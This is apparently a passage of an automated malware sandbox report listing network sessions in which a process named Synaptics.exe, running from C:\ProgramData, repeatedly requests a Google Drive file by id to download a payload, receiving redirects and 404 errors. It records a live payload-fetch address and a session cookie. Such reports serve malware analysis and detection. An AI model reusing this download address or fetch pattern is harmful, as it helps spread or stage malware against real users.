                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:07:42 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4-gXrvpnS_x0sRkk5UjghrjASPgjZtMq48-Ign2VLt4zFndu5UpCUbYvo9vIyGx2vqawHggZo
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:42 GMT
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-2tdIgcJMty6xbvmB5N4kfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:07:42 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                2024-12-25 08:07:42 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 4a 6d 4b 69 73 49 47 36 69 73 2d 6f 74 64 30 33 73 47 6e 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="AJmKisIG6is-otd03sGniw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:07:42 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                15192.168.2.449790142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:41 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:41 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ygT1NUCnJEfDO1yINcJNyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.2.449787142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:07:42 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC5tWkbpQQfrWHUB1qF2whu5JOzeaVIYdglggN0xXM8cFaz--Cqbmg_Z7rVJ6lfhQN_ro7ePPwA
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:42 GMT
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-AMTLmBSgpgtiXi7zY_-KAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:07:42 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                2024-12-25 08:07:42 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 79 6b 78 4e 47 6a 36 76 4b 4f 4e 6c 44 33 44 5f 59 54 6d 6b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="2ykxNGj6vKONlD3D_YTmkw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:07:42 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                17192.168.2.449800142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:44 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:45 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Lm08MErOMzF_1LRLM5XxSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                18192.168.2.449801142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:44 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:45 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-r9mie0ztFzqmSyIyZqej6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                19192.168.2.449810142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:48 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:49 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-f4MvB2hoZIr35eh-Nhvvhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                20192.168.2.449811142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:48 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:49 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-m7qlLIs-FzE8yNNh40X37A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                21192.168.2.449821142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:52 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:53 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:53 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-djY3v4uWc5CYz4HKhHO3Cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                22192.168.2.449822142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:52 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:53 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:53 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Z7scb3zTjj3ga8VP017nUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                23192.168.2.449831142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:56 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:57 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
